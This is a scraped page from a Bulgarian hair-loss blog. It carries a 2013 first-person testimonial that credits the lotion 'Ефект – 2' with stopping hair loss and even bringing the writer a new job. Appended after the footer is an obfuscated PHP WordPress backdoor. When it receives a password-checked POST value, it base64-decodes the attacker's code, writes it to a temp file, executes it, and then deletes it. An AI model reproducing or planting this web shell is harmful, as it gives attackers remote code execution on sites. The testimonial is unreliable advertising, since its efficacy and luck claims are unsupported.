Помогнах си сама срещу косопад | Косопад

Косопада спрях сама с билки и „Ефект – 2”

Светла Денчева: Помогнах си сама срещу косопад

Светла Денчева: Помогнах си сама срещу косопад

Докато навърших 57 години не познавах мъката. Имам хубаво семейство, с мъжа ми е кротък и се разбираме, а децата пораснаха и вече очаквах да ме зарадват с внуци. Никога не съм имала проблеми със здравето, а за темата косопад не знаех абсолютно нищо.

Когато започнах да броя месеците до пенсия обаче ме уволниха без предизвестие от магазина в който работех. Собственикът каза, че е решил да обнови персонала изцяло, защото не е доволен от нашата работа и иска да си вземе млади момичета, които да научи сам как да се отнасят с клиентите. Плановете ми рухнаха само за един миг и се притесних много сериозно, защото нямаше как да си набавя оставащите три години стаж. Мина месец и косата ми започна да капе. Тогава напълно разбрах колко много ужас се съдържа в думичката косопад.

Отидох на лекар и той ми постави диагноза стрес. Каза, че проблемът ще се реши от самосебе си до няколко месеца и не трябва да правя нищо. Хубаво, ама нещата не се случиха точно така. Косата продължи да оредява и се наложи да си купя някаква китайска перука, с която приличах на плашило. Така продължи, докато един ден големият син не дойде у нас да ни види и си забрави весника. Там видях статия за лосиона срещу косопад „Ефект – 2” и се заинтригувах. На другия ден реших да си поръчам, защото не е толкова скъп, а ми предлагаше невероятната възможност за решение на моя проблем.

От този момент нататък нещата сякаш потръгнаха. Само за два дни куриер ми достави „Ефект – 2” и направих първата процедура. Буквално минути след това джиесемът ми иззвъня и получих обаждане от малко квартално магазинче, които ме взеха на работа. Най – хубавото от всичко е, че страшния косопад спря още на първата седмица, а не след дълго забелязах нови косъмчета по главата си. Вярвам, че точно „Ефект – 2“ ми донесе късмет и накара косопада да изчезне, вероятно заради многото билки, които се съдържат в него.

С уважение: Светла Денчева, София

29. април 2013 15:00:47 от Косопад
Категории: Лосион срещу косопад, Споделено | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}